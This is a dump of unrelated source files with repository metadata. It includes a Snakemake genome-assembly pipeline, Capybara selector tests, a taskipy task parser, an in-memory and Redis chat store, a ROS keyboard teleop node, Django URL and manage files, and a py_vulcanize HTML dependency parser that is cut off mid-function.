" max_len_split.append(''.join(k[len(k)//2:len(k)]))\n",
" ttemp=((model.translate(k,target_lang='en')))\n",
" stemp=' '.join(ttemp)\n",
" translate.append([stemp])\n",
"\n",
"#create a folder called translate\n",
"\n",
" write_file = open(f\"/content/translate/{ind} - translate.txt\",'w')\n",
"\n",
" for i in translate:\n",
" write_file.writelines(i)\n",
" write_file.write('\\n\\n')\n",
"\n",
" write_file.close()\n",
" tamil_open.close()"
],
"execution_count": 4,
"outputs": []
}
]
} | [
"74132439+samyuktha-12@users.noreply.github.com"
] | 74132439+samyuktha-12@users.noreply.github.com |
db8fb812de665a15d02b129767215fa3ad919be0 | 24bb9b9f4bf8e18bd11b8f12f0aab1883b7e3e22 | /Snakefile | 9e789f1c7d8395a15ae7013336c1c4f11e3af039 | [] | no_license | xyloforce/snakemake_workshop | 2b2dcf05ea65e969bf6168a46a7e60bbb3749b4e | 213d6d7b0da3916a2de28b654a14553e4bf9d1c3 | refs/heads/master | 2022-12-15T11:42:09.877347 | 2020-09-04T09:21:59 | 2020-09-04T09:21:59 | 292,662,135 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,297 | configfile: "config.yaml"
# Read-quality control: run FaQCs on one sample's paired-end FASTQ files
# and produce a per-sample QC report PDF.
rule quality_fastq:
    input:
        # Paired-end reads named with the Illumina _R1/_R2 convention.
        R1 = config["fastq_path"] + "{sample}_R1_001.fastq.gz",
        R2 = config["fastq_path"] + "{sample}_R2_001.fastq.gz"
    output:
        "{sample}_qc_report.pdf"
    params:
        # Path to the FaQCs executable, taken from config.yaml.
        faqcs = config["faqcs"],
        # FaQCs --prefix: name the output files after the sample wildcard.
        prefix = lambda wildcards: wildcards.sample
    shell:
        "{params.faqcs} -1 {input.R1} -2 {input.R2} --prefix {params.prefix} -d ."
# De novo assembly: assemble each sample's paired-end reads with SPAdes
# and rename the resulting scaffolds file to <sample>.fasta.
rule assembly:
    conda:
        "envs/spades.yaml"
    input:
        R1 = config["fastq_path"] + "{sample}_R1_001.fastq.gz",
        R2 = config["fastq_path"] + "{sample}_R2_001.fastq.gz"
    output:
        "{sample}.fasta"
    params:
        prefix = lambda wildcards: wildcards.sample
    log: "spades_{sample}.log"
    threads: 6
    # SPAdes writes its outputs into the working directory; stdout goes to
    # the log and the scaffolds file is renamed to the per-sample output.
    shell:
        """
        spades.py -o . -1 {input.R1} -2 {input.R2} > {log}
        mv scaffolds.fasta {params.prefix}.fasta
        """
# Assembly QC: evaluate each sample's assembly against the reference
# genome with QUAST and keep the PDF report under a per-sample name.
rule quality_assembly:
    conda:
        "envs/quast.yaml"
    input:
        genome = "{sample}.fasta",
        reference = config["reference_genome"]
    output:
        "{sample}.assembly_report.pdf"
    # NOTE(review): ``prefix`` is not referenced by the shell command below —
    # confirm whether it is still needed.
    params:
        prefix = lambda wildcards: wildcards.sample
    shell:
        """
        quast -o . {input.genome} -r {input.reference}
        mv report.pdf {output}
        """
| [
"fabsassolas@outlook.fr"
] | fabsassolas@outlook.fr | |
043da33cdda73167b31521deaecb55c86c6631fe | 7eb4e06c98073a19e655bcc915976d19ab4c1ea5 | /guvi2.py | e214de7fb022a38c91b0dd0555c10aeb0a6ac079 | [] | no_license | nagayugeshgb/Guvi | 1ad98ab2cc9e2a55eb3fb7199e93210d8b8aa920 | 88e37812379dd947d25f36c74a5eb50f35675019 | refs/heads/master | 2020-06-21T02:50:58.650718 | 2019-11-18T05:46:54 | 2019-11-18T05:46:54 | 197,326,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | a=int(input("enter the number"))
# Classify the previously-read number ``a``: positive values are reported
# as "Even"/"Odd"; zero and negatives are rejected as "invalid".
if a <= 0:
    print("invalid")
elif a % 2 == 0:
    print("Even")
else:
    print("Odd")
| [
"noreply@github.com"
] | nagayugeshgb.noreply@github.com |
878cd2a98f34b3076bd8c65af2579105dc54b38c | d737a0c3a9bf6ddcf99ad1e226f1ee7c81bfd238 | /tests/get_manually_entities.py | 2a1672a9fe009030506cf7e0a12a2ef0542d1d8d | [
"MIT"
] | permissive | deniz195/barely-db | 714ad32c70fe129d2ea74c300aca458e972c84f5 | 984b5098ad92c2bbe6af0b9d44a73ce431b59c7e | refs/heads/master | 2023-03-03T17:32:47.630807 | 2020-08-22T14:32:11 | 2020-08-22T14:32:11 | 262,839,090 | 0 | 0 | MIT | 2020-07-10T11:17:12 | 2020-05-10T17:25:04 | HTML | UTF-8 | Python | false | false | 1,214 | py | import os
from pathlib import Path
def _get_all_entity_name(path):
    """Collect the names of all second-level entity directories under *path*.

    Every top-level directory except the special ``__code`` folder is
    scanned, and the names of the directories found directly inside it are
    returned.  A name that occurs under several head folders appears once.
    """
    collected = {}
    for head in (entry.path for entry in os.scandir(path) if entry.is_dir()):
        if os.path.basename(head) == '__code':
            continue
        subdirs = [entry for entry in os.scandir(head) if entry.is_dir()]
        collected.update({entry.name: entry.path for entry in subdirs})
    return list(collected.keys())
def _get_all_entity_paths(path):
    """Collect the paths of all second-level entity directories under *path*.

    Mirrors :func:`_get_all_entity_name` but returns the full paths of the
    subdirectories instead of their names; duplicate names keep only the
    last path seen.
    """
    collected = {}
    for head in (entry.path for entry in os.scandir(path) if entry.is_dir()):
        if os.path.basename(head) == '__code':
            continue
        subdirs = [entry for entry in os.scandir(head) if entry.is_dir()]
        collected.update({entry.name: entry.path for entry in subdirs})
    return list(collected.values())
def get_all_entity(path, mode):
    """Return every entity under *path*: names for mode ``'name'``, paths otherwise."""
    selector = _get_all_entity_name if mode == 'name' else _get_all_entity_paths
    return selector(path)
| [
"lciernik@battrion.com"
] | lciernik@battrion.com |
4c8c35cbfea397675fc14fa36df73ea858689f95 | ea3753f008a3fd4739d150879fba749f7c6d8807 | /wschat/db.py | ab2a3539e01493f021aa139f28833e1a23b3fe2b | [] | no_license | PavelBass/wschat | b7da9a1fcd4b7831b0a5573f6347d199c8b5284e | c5232f0afd21187b46df46d3a75a8d9c6a46f473 | refs/heads/master | 2021-01-10T16:02:31.470056 | 2015-05-24T21:51:31 | 2015-05-24T21:51:31 | 36,147,953 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,340 | py | import hashlib
import collections
import json
from abc import ABCMeta, abstractmethod, abstractproperty
try:
import redis
except ImportError:
redis = None
# Per-user database record: md5 password hash plus the tuples of rooms the
# user may enter and is currently in ((room, nick) pairs).
UserRecord = collections.namedtuple(
    'UserRecord', ['pass_hash', 'allowed_rooms', 'current_rooms'])
class DB(object):
    """Abstract interface of the chat storage back end.

    Implementations manage user accounts (login + md5 password hash),
    chat rooms with message history, and per-room nicknames stored as
    (room, nick) pairs in each user's ``current_rooms``.
    """

    # Python 2 style ABC registration; inert no-op on Python 3.
    __metaclass__ = ABCMeta

    _default_rooms = ('Free Chat', 'Python Developers', 'JavaScript Developers')
    _default_room = _default_rooms[0]

    @abstractmethod
    def is_correct_user(self, login, password):
        """Check if the passed login exists and the password is correct.

        :param login: passed login
        :param password: passed password (not hash)
        :return: None if the login is unknown, True if the password
            matches, False otherwise.
        """
        pass

    @abstractmethod
    def get_current_rooms(self, login):
        """Return the rooms the user is currently in (iterable of names)."""
        pass

    @abstractmethod
    def add_room_to_current(self, login, room):
        """Add *room* to the user's current rooms and persist the record."""
        pass

    @abstractmethod
    def remove_room_from_current(self, login, room):
        """Remove *room* from the user's current rooms and persist the record."""
        pass

    @abstractmethod
    def get_room_history(self, room):
        """Return the last 10 messages of *room*, or None if it does not exist."""
        pass

    @abstractmethod
    def change_nick_in_room(self, login, room, nick):
        """Change the nickname the user goes by inside *room*."""
        pass

    @abstractmethod
    def get_current_nick(self, login, room):
        """Return the stored nickname of the user for *room*."""
        pass

    @abstractmethod
    def new_user(self, login, password):
        """Create a new user.

        :return: None if the login is already taken, otherwise the
            list/tuple of rooms the new user is allowed to enter.
        """
        pass

    @abstractmethod
    def new_room(self, room):
        """Create a new room; False if it already exists, True after creation."""
        pass

    @abstractmethod
    def new_message(self, room, mess):
        """Append *mess* to the history of *room*."""
        pass

    # ``abc.abstractproperty`` is deprecated; stacking @property over
    # @abstractmethod is the supported spelling with identical behaviour.
    @property
    @abstractmethod
    def all_rooms(self):
        """Return all existing rooms (list/tuple of names)."""
        pass

    @property
    def default_room(self):
        """The room every fresh or anonymous user starts in."""
        return self._default_room

    @property
    def default_rooms(self):
        """Rooms that every back end creates unconditionally at start-up."""
        return self._default_rooms
class DBPython(DB):
    """In-memory DB backend: everything lives in dicts, nothing persists."""

    def __init__(self):
        self._users = dict()   # login -> UserRecord
        self._rooms = dict()   # room name -> list of messages
        for room in self.default_rooms:
            self._rooms[room] = list()

    def is_correct_user(self, login, password):
        """None if *login* is unknown, else whether the md5 of *password* matches."""
        user = self._users.get(login, None)
        if user is None:
            return None
        return hashlib.md5(password).hexdigest() == user.pass_hash

    def get_current_rooms(self, login):
        """Return the names of the rooms *login* is currently in.

        Bug fix: the previous version applied ``x[0]`` to the fallback
        tuple of room *names* as well, so an unknown/anonymous login got
        the first character of the default room ('F') instead of its name.
        """
        if login in self._users:
            return tuple(room for room, _nick in self._users[login].current_rooms)
        return (self.default_room,)

    def add_room_to_current(self, login, room):
        """Join *room* (no-op for anonymous users or if already joined)."""
        if login is None or room in self.get_current_rooms(login):
            return
        user = self._users[login]
        rooms = list(user.current_rooms)
        rooms.append((room, login))  # the initial nick in a room is the login
        self._users[login] = UserRecord(user.pass_hash, user.allowed_rooms, tuple(rooms))

    def remove_room_from_current(self, login, room):
        """Leave *room*: drop its (room, nick) pair from the user's record."""
        user = self._users[login]
        rooms = list(user.current_rooms)
        for idx, entry in enumerate(rooms):
            if entry[0] == room:
                rooms.pop(idx)
                break
        self._users[login] = UserRecord(user.pass_hash, user.allowed_rooms, tuple(rooms))

    def get_room_history(self, room):
        """Last 10 messages of *room*, or None when the room does not exist."""
        history = self._rooms.get(room, None)
        if history is None:
            return None
        return history[-10:]

    def change_nick_in_room(self, login, room, nick):
        """Set the user's nickname for *room* (no-op for anonymous users)."""
        if login is None:
            return
        user = self._users[login]
        rooms = list(user.current_rooms)
        for idx, entry in enumerate(rooms):
            if entry[0] == room:
                rooms[idx] = (room, nick)
        self._users[login] = UserRecord(user.pass_hash, user.allowed_rooms, tuple(rooms))

    def get_current_nick(self, login, room):
        """Nickname of *login* in *room*; anonymous users are 'Anonymous'."""
        if login is None:
            return 'Anonymous'
        for entry in self._users[login].current_rooms:
            if entry[0] == room:
                return entry[1]

    def new_user(self, login, password):
        """Register *login*; None if taken, else the tuple of allowed rooms."""
        if login in self._users:
            return None
        allowed_rooms = (self.default_room,)
        self._users[login] = UserRecord(hashlib.md5(password).hexdigest(), allowed_rooms, tuple())
        return allowed_rooms

    def new_room(self, room):
        """Create *room*; False if it already exists, True after creation."""
        if room in self._rooms:
            return False
        self._rooms[room] = list()
        return True

    def new_message(self, room, mess):
        """Append *mess* to the room's history (the room must exist)."""
        self._rooms[room].append(mess)

    @property
    def all_rooms(self):
        """All known room names."""
        return self._rooms.keys()
class DBRedis(DB):
    """DB backend persisted in redis.

    Keys are namespaced under ``RamblerTaskChat:``: ``USER:<login>`` hashes
    hold pass_hash / allowed_rooms / current_rooms (the room lists are
    JSON-encoded), ``ROOM:<name>`` lists hold the message history.
    """

    def __init__(self):
        self.r = redis.Redis()
        self._pre = 'RamblerTaskChat:'
        # Make sure the default rooms exist so all_rooms() can find them.
        for room in self.default_rooms:
            key = '%sROOM:%s' % (self._pre, room)
            if not self.r.exists(key):
                self.r.lpush(key, 'Created room "%s"' % room)

    def is_correct_user(self, login, password):
        """None if *login* is unknown, else whether the md5 of *password* matches."""
        key = '%sUSER:%s' % (self.pre, login)
        pass_hash = self.r.hget(key, 'pass_hash')
        if pass_hash is None:
            return None
        return hashlib.md5(password).hexdigest() == pass_hash

    def get_current_rooms(self, login):
        """Yield the names of the rooms *login* is currently in."""
        key = '%sUSER:%s' % (self.pre, login)
        rooms = json.loads(self.r.hget(key, 'current_rooms'))
        return (entry[0] for entry in rooms)

    def add_room_to_current(self, login, room):
        """Join *room* (no-op for anonymous users or if already joined)."""
        if login is None or room in self.get_current_rooms(login):
            return
        key = '%sUSER:%s' % (self.pre, login)
        rooms = json.loads(self.r.hget(key, 'current_rooms'))
        rooms.append((room, login))  # the initial nick in a room is the login
        self.r.hset(key, 'current_rooms', json.dumps(rooms))

    def remove_room_from_current(self, login, room):
        """Leave *room*: drop its (room, nick) pair from the user's record."""
        key = '%sUSER:%s' % (self.pre, login)
        rooms = json.loads(self.r.hget(key, 'current_rooms'))
        for idx, entry in enumerate(rooms):
            if entry[0] == room:
                rooms.pop(idx)
                break
        self.r.hset(key, 'current_rooms', json.dumps(rooms))

    def get_room_history(self, room):
        """Return the last 10 messages stored for *room*."""
        key = '%sROOM:%s' % (self._pre, room)
        return self.r.lrange(key, -10, -1)

    def change_nick_in_room(self, login, room, nick):
        """Set the user's nickname for *room*."""
        key = '%sUSER:%s' % (self.pre, login)
        rooms = json.loads(self.r.hget(key, 'current_rooms'))
        for idx, entry in enumerate(rooms):
            if entry[0] == room:
                rooms[idx] = (room, nick)
        self.r.hset(key, 'current_rooms', json.dumps(rooms))

    def get_current_nick(self, login, room):
        """Nickname of *login* in *room*; anonymous users are 'Anonymous'."""
        if login is None:
            return 'Anonymous'
        key = '%sUSER:%s' % (self.pre, login)
        rooms = json.loads(self.r.hget(key, 'current_rooms'))
        for entry in rooms:
            if entry[0] == room:
                return entry[1]

    def new_user(self, login, password):
        """Register *login*; None if taken, else the list of allowed rooms."""
        key = '%sUSER:%s' % (self.pre, login)
        if self.r.exists(key):
            return None
        allowed_rooms = [self.default_room]
        vals = dict(
            pass_hash=hashlib.md5(password).hexdigest(),
            allowed_rooms=json.dumps(allowed_rooms),
            current_rooms='[]'
        )
        self.r.hmset(key, vals)
        return allowed_rooms

    def new_room(self, room):
        """Create *room*; False if it already exists, True after creation.

        Bug fix: previously the room key was never written here, so a new
        room did not appear in ``all_rooms`` (and had no history entry)
        until the first message arrived — unlike the default rooms created
        in ``__init__`` and unlike ``DBPython.new_room``.  Create the key
        the same way ``__init__`` does.
        """
        key = '%sROOM:%s' % (self._pre, room)
        if self.r.exists(key):
            return False
        self.r.lpush(key, 'Created room "%s"' % room)
        return True

    def new_message(self, room, mess):
        """Append *mess* to the room's redis list."""
        key = '%sROOM:%s' % (self._pre, room)
        self.r.rpush(key, mess)

    @property
    def all_rooms(self):
        """All room names, recovered by stripping the key prefix."""
        pattern = '%sROOM:*' % self._pre
        rooms = self.r.keys(pattern)
        prefix_len = len(pattern) - 1  # drop the trailing '*' from the length
        return [name[prefix_len:] for name in rooms]

    @property
    def pre(self):
        """The key namespace prefix shared by every record."""
        return self._pre
| [
"statgg@gmail.com"
] | statgg@gmail.com |
7918ac56d5849d5397eee17e699ba9a45cf94e5f | b2c896ca9f2acb81115708ce6cf8d01396e71a18 | /capybara/tests/session/element/test_matches_selector.py | ff60142d44cd19b211832859a9ff8d2200284aea | [
"MIT"
] | permissive | elliterate/capybara.py | b846f3cb1a712a120361849b378d437775c2c6db | eafd9ac50d02e8b57ef90d767493c8fa2be0739a | refs/heads/master | 2023-08-16T13:56:51.506840 | 2022-01-16T18:04:22 | 2022-01-16T18:04:22 | 64,620,050 | 63 | 22 | MIT | 2022-01-16T18:04:23 | 2016-07-31T23:02:18 | Python | UTF-8 | Python | false | false | 3,002 | py | import pytest
import capybara
class MatchesSelectorTestCase:
    """Shared fixtures: open /with_html and expose the span containing 42."""
    @pytest.fixture(autouse=True)
    def setup_session(self, session):
        # Every test in the subclasses runs against the /with_html page.
        session.visit("/with_html")
    @pytest.fixture
    def element(self, session):
        # The element whose selector-matching behaviour is under test.
        return session.find("//span", text="42")
class TestMatchesSelector(MatchesSelectorTestCase):
    """``Element.matches_selector``: True only for selectors the element satisfies."""
    def test_is_true_if_the_element_matches_the_given_selector(self, element):
        assert element.matches_selector("xpath", "//span") is True
        assert element.matches_selector("css", "span.number") is True
    def test_is_false_if_the_element_does_not_match_the_given_selector(self, element):
        assert element.matches_selector("xpath", "//div") is False
        assert element.matches_selector("css", "span.not_a_number") is False
    def test_uses_default_selector(self, element):
        # With the default selector switched to CSS, bare strings are CSS.
        capybara.default_selector = "css"
        assert not element.matches_selector("span.not_a_number")
        assert element.matches_selector("span.number")
    def test_works_with_elements_located_via_a_sibling_selector(self, element):
        sibling = element.sibling("css", "span", text="Other span")
        assert sibling.matches_selector("xpath", "//span")
        assert sibling.matches_selector("css", "span")
    def test_works_with_the_html_element(self, session):
        html = session.find("/html")
        assert html.matches_selector("css", "html")
    def test_discards_all_matches_where_the_given_string_is_not_contained(self, element):
        # The text filter must be satisfied in addition to the selector.
        assert element.matches_selector("//span", text="42")
        assert not element.matches_selector("//span", text="Doesnotexist")
class TestNotMatchSelector(MatchesSelectorTestCase):
    """``Element.not_match_selector``: the logical negation of matches_selector."""
    def test_is_false_if_the_element_matches_the_given_selector(self, element):
        assert element.not_match_selector("xpath", "//span") is False
        assert element.not_match_selector("css", "span.number") is False
    def test_is_true_if_the_element_does_not_match_the_given_selector(self, element):
        assert element.not_match_selector("xpath", "//div") is True
        assert element.not_match_selector("css", "span.not_a_number") is True
    def test_uses_default_selector(self, element):
        # With the default selector switched to CSS, bare strings are CSS.
        capybara.default_selector = "css"
        assert element.not_match_selector("span.not_a_number")
        assert not element.not_match_selector("span.number")
    def test_works_with_elements_located_via_a_sibling_selector(self, element):
        sibling = element.sibling("css", "span", text="Other span")
        assert not sibling.not_match_selector("xpath", "//span")
        assert sibling.not_match_selector("css", "div")
    def test_works_with_the_html_element(self, session):
        html = session.find("/html")
        assert html.not_match_selector("css", "body")
    def test_discards_all_matches_where_the_given_string_is_contained(self, element):
        # The text filter must fail (or the selector) for the negation to hold.
        assert not element.not_match_selector("//span", text="42")
        assert element.not_match_selector("//span", text="Doesnotexist")
| [
"ian@elliterate.com"
] | ian@elliterate.com |
c950a17588136d90139e61d8b1f7be25e8996ea6 | 389138ce8d651f9409f1e51526bdb02cc078fc9d | /taskipy/task.py | c357b98027ffd7230b5764ba2844394d61615d73 | [
"MIT"
] | permissive | emann/taskipy | cfc230d07c8378d8c6d5617ae56f0ffc6b7062cd | a57618590b3ad3be25f10890efbaf60d5b5cb27b | refs/heads/master | 2023-04-27T23:08:40.671322 | 2021-05-16T19:13:31 | 2021-05-16T19:13:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,516 | py | from taskipy.exceptions import MalformedTaskError
class Task:
    """A single runnable task parsed from the taskipy tasks table.

    A task entry is either a plain command string or a dict of the shape
    ``{cmd, help}``; anything else raises ``MalformedTaskError``.
    """

    def __init__(self, task_name: str, task_toml_contents: object):
        self.__task_name = task_name
        self.__task_command = self.__extract_task_command(task_toml_contents)
        self.__task_description = self.__extract_task_description(task_toml_contents)

    @property
    def name(self):
        """The task's name (the TOML key)."""
        return self.__task_name

    @property
    def command(self):
        """The shell command the task runs."""
        return self.__task_command

    @property
    def description(self):
        """Human-readable help text; empty when none was given."""
        return self.__task_description

    def __extract_task_command(self, task_toml_contents: object) -> str:
        # A bare string *is* the command.
        if isinstance(task_toml_contents, str):
            return task_toml_contents
        if not isinstance(task_toml_contents, dict):
            raise MalformedTaskError(self.__task_name, 'tasks must be strings, or dicts that contain { cmd, help }')
        if 'cmd' not in task_toml_contents:
            raise MalformedTaskError(self.__task_name, 'the task item does not have the "cmd" property')
        return task_toml_contents['cmd']

    def __extract_task_description(self, task_toml_contents: object) -> str:
        # A bare string carries no help text.
        if isinstance(task_toml_contents, str):
            return ''
        if not isinstance(task_toml_contents, dict):
            raise MalformedTaskError(self.__task_name, 'tasks must be strings, or dicts that contain { cmd, help }')
        return task_toml_contents.get('help', '')
| [
"noreply@github.com"
] | emann.noreply@github.com |
e7d128e1500aba2f7670ba59a46061cdec915f47 | 069d2985895eefe33454e57ff2d85b9fa8aa7fa0 | /run.py | df4f5781aa2fc97d2b52b3f42b8ed9f9d8363f45 | [] | no_license | KIRA009/formbuilder | 8a6dd2949b42560f3b7cbad4b2c00e32e09ff55f | 880fdbe211d80c31870dd8da84e376de9598b738 | refs/heads/master | 2023-02-05T16:42:08.806984 | 2019-07-02T18:34:05 | 2019-07-02T18:34:05 | 194,048,846 | 1 | 1 | null | 2023-02-02T06:32:31 | 2019-06-27T07:52:40 | JavaScript | UTF-8 | Python | false | false | 253 | py | from app_builder import build_app
import os
# Working directory at launch; the .env settings file is expected here.
ROOT_DIR = os.getcwd()
# Build the Flask app plus the db/migrate/login_manager handles that
# build_app returns, configured from the .env file.
# NOTE(review): the '\.env' literal relies on '\.' not being a recognised
# string escape (a Windows-style separator) — confirm the intended path.
app, db, migrate, login_manager = build_app(app_name=__name__, env_path=ROOT_DIR + '\.env', config_env='SETTINGS')
# Imported for its side effects: registers the application's view routes.
from myapp.views import *
if __name__ == '__main__':
    app.run()
| [
"shohanduttaroy99@gmail.com"
] | shohanduttaroy99@gmail.com |
413ca2abc71b33a69400411278b07e243fbf15a8 | e4910c4b436223859d91f3569cadafa69a3c777b | /src/racecar/scripts/keyboard.py | c8c26dd85a147588db69800067b55328e93f0960 | [
"BSD-3-Clause"
] | permissive | pmusau17/F1TenthHardware | 81ae6870e15c1fe39a1f386b8bcfaa653bf2675c | 3ae3ab1cedd89e56db2fbabe24f1c6a79d3553d9 | refs/heads/master | 2023-04-01T09:02:12.635614 | 2021-04-07T16:34:17 | 2021-04-07T16:34:17 | 298,356,593 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,059 | py | #!/usr/bin/env python
import rospy
from racecar.msg import drive_param
from ackermann_msgs.msg import AckermannDriveStamped
import sys, select, termios, tty
# Key -> (drive multiplier, steering multiplier): w/s drive, a/d steer.
keyBindings = {
    'w': (1, 0),
    'd': (1, -1),
    'a': (1, 1),
    's': (-1, 0),
}
def getKey():
tty.setraw(sys.stdin.fileno())
select.select([sys.stdin], [], [], 0)
key = sys.stdin.read(1)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
return key
speed = 0.7
turn = 0.5
if __name__=="__main__":
settings = termios.tcgetattr(sys.stdin)
rospy.init_node('keyboard', anonymous=True)
args = rospy.myargv()[1:]
if(len(args)==1):
racecar_name = args[0]
else:
racecar_name = ''
pub = rospy.Publisher(racecar_name+'/ackermann_cmd_mux/input/teleop', AckermannDriveStamped, queue_size=10)
x = 0
th = 0
status = 0
try:
while(1):
key = getKey()
if key in keyBindings.keys():
x = keyBindings[key][0]
th = keyBindings[key][1]
else:
x = 0
th = 0
if (key == '\x03'):
break
msg = drive_param()
msg.velocity = x*speed
msg.angle = th*turn
rospy.loginfo(str(msg.velocity))
rospy.loginfo(str(msg.angle))
print(x*speed,th*turn)
msg = AckermannDriveStamped();
msg.header.stamp = rospy.Time.now();
msg.header.frame_id = "base_link";
msg.drive.speed = x*speed
msg.drive.acceleration = 1
msg.drive.jerk = 1
msg.drive.steering_angle = th*turn
msg.drive.steering_angle_velocity = 1
pub.publish(msg)
except:
print 'error'
finally:
msg = drive_param()
msg.velocity = 0
msg.angle = 0
msg = AckermannDriveStamped();
msg.header.stamp = rospy.Time.now();
msg.header.frame_id = "base_link";
msg.drive.speed = x*speed
msg.drive.acceleration = 1
msg.drive.jerk = 1
msg.drive.steering_angle = th*turn
msg.drive.steering_angle_velocity = 1
pub.publish(msg)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
| [
"pmusau13ster@gmail.com"
] | pmusau13ster@gmail.com |
616d1055e765f7c25ff5fe9c18a6da3ac5ee0136 | 9aab55d9c762b301a6cc210fa4c9a283751b9afb | /manage.py | 4e83eea1130aa492243ba92ca4e8b81726357e2c | [] | no_license | kemoeverlyne/stock | ecc4ebed1fed3b12d2ecfbc1207a570b25d31de8 | bb0a093f8072222fdc8543d73bb0443143c919a9 | refs/heads/master | 2023-04-27T22:57:58.277368 | 2021-05-22T11:51:09 | 2021-05-22T11:51:09 | 369,791,941 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 663 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'stockex.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"kemoeverlyne@gmail.com"
] | kemoeverlyne@gmail.com |
6e49ed65e73d2464b77c76a499689f58dccb315c | 1c283e77b584b8f23b85133d1e9333904682b133 | /travelkenya/urls.py | 8f41e23f4afaf0f06307fbdd7abda252a8a851b6 | [
"MIT"
] | permissive | Charles-Ndugire/hiking-centers | 6a9ec250ccc27106b5964f23238f3effef8a7cb6 | b2ce6c79660d65557cded334213b5cf6c20f827f | refs/heads/master | 2023-03-28T11:11:03.706417 | 2021-03-24T16:18:10 | 2021-03-24T16:18:10 | 349,413,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 425 | py | from django.conf.urls import url
from . import views
from django.contrib import admin
urlpatterns=[
url(r'^$',views.article_of_day,name='articleToday'),
url(r'^archives/(\d{4}-\d{2}-\d{2})/$',views.past_days_article,name = 'pastArticle'),
url(r'^article/(\d+)',views.article,name ='article'),
url(r'admin/', admin.site.urls, name='admin' ),
url(r'',(views.article_of_day), name='articleOfDay')
]
| [
"ndugirecharles@gmail.com"
] | ndugirecharles@gmail.com |
06c5cd504516c90e7f07c7a903062d100667cc1e | 600df3590cce1fe49b9a96e9ca5b5242884a2a70 | /third_party/catapult/third_party/py_vulcanize/py_vulcanize/parse_html_deps.py | 6fbe31daac48d0626acb4efdd44a3050c975ead4 | [
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | permissive | metux/chromium-suckless | efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a | 72a05af97787001756bae2511b7985e61498c965 | refs/heads/orig | 2022-12-04T23:53:58.681218 | 2017-04-30T10:59:06 | 2017-04-30T23:35:58 | 89,884,931 | 5 | 3 | BSD-3-Clause | 2022-11-23T20:52:53 | 2017-05-01T00:09:08 | null | UTF-8 | Python | false | false | 5,738 | py | # Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys
from py_vulcanize import module
from py_vulcanize import strip_js_comments
from py_vulcanize import html_generation_controller
def _AddToPathIfNeeded(path):
if path not in sys.path:
sys.path.insert(0, path)
def _InitBeautifulSoup():
catapult_path = os.path.abspath(
os.path.join(os.path.dirname(__file__),
os.path.pardir, os.path.pardir, os.path.pardir))
bs_path = os.path.join(catapult_path, 'third_party', 'beautifulsoup4')
_AddToPathIfNeeded(bs_path)
html5lib_path = os.path.join(catapult_path, 'third_party', 'html5lib-python')
_AddToPathIfNeeded(html5lib_path)
six_path = os.path.join(catapult_path, 'third_party', 'six')
_AddToPathIfNeeded(six_path)
_InitBeautifulSoup()
import bs4
class InlineScript(object):
def __init__(self, soup):
if not soup:
raise module.DepsException('InlineScript created without soup')
self._soup = soup
self._stripped_contents = None
self._open_tags = None
@property
def contents(self):
return unicode(self._soup.string)
@property
def stripped_contents(self):
if not self._stripped_contents:
self._stripped_contents = strip_js_comments.StripJSComments(
self.contents)
return self._stripped_contents
@property
def open_tags(self):
if self._open_tags:
return self._open_tags
open_tags = []
cur = self._soup.parent
while cur:
if isinstance(cur, bs4.BeautifulSoup):
break
open_tags.append(_Tag(cur.name, cur.attrs))
cur = cur.parent
open_tags.reverse()
assert open_tags[-1].tag == 'script'
del open_tags[-1]
self._open_tags = open_tags
return self._open_tags
def _CreateSoupWithoutHeadOrBody(html):
soupCopy = bs4.BeautifulSoup(html, 'html5lib')
soup = bs4.BeautifulSoup()
soup.reset()
if soupCopy.head:
for n in soupCopy.head.contents:
n.extract()
soup.append(n)
if soupCopy.body:
for n in soupCopy.body.contents:
n.extract()
soup.append(n)
return soup
class HTMLModuleParserResults(object):
def __init__(self, html):
self._soup = bs4.BeautifulSoup(html, 'html5lib')
self._inline_scripts = None
@property
def scripts_external(self):
tags = self._soup.findAll('script', src=True)
return [t['src'] for t in tags]
@property
def inline_scripts(self):
if not self._inline_scripts:
tags = self._soup.findAll('script', src=None)
self._inline_scripts = [InlineScript(t.string) for t in tags]
return self._inline_scripts
@property
def imports(self):
tags = self._soup.findAll('link', rel='import')
return [t['href'] for t in tags]
@property
def stylesheets(self):
tags = self._soup.findAll('link', rel='stylesheet')
return [t['href'] for t in tags]
@property
def inline_stylesheets(self):
tags = self._soup.findAll('style')
return [unicode(t.string) for t in tags]
def YieldHTMLInPieces(self, controller, minify=False):
yield self.GenerateHTML(controller, minify)
def GenerateHTML(self, controller, minify=False, prettify=False):
soup = _CreateSoupWithoutHeadOrBody(unicode(self._soup))
# Remove declaration.
for x in soup.contents:
if isinstance(x, bs4.Doctype):
x.extract()
# Remove declaration.
for x in soup.contents:
if isinstance(x, bs4.Declaration):
x.extract()
# Remove all imports.
imports = soup.findAll('link', rel='import')
for imp in imports:
imp.extract()
# Remove all script links.
scripts_external = soup.findAll('script', src=True)
for script in scripts_external:
script.extract()
# Remove all in-line scripts.
scripts_external = soup.findAll('script', src=None)
for script in scripts_external:
script.extract()
# Process all in-line styles.
inline_styles = soup.findAll('style')
for style in inline_styles:
html = controller.GetHTMLForInlineStylesheet(unicode(style.string))
if html:
ns = soup.new_tag('style')
ns.append(bs4.NavigableString(html))
style.replaceWith(ns)
else:
style.extract()
# Rewrite all external stylesheet hrefs or remove, as needed.
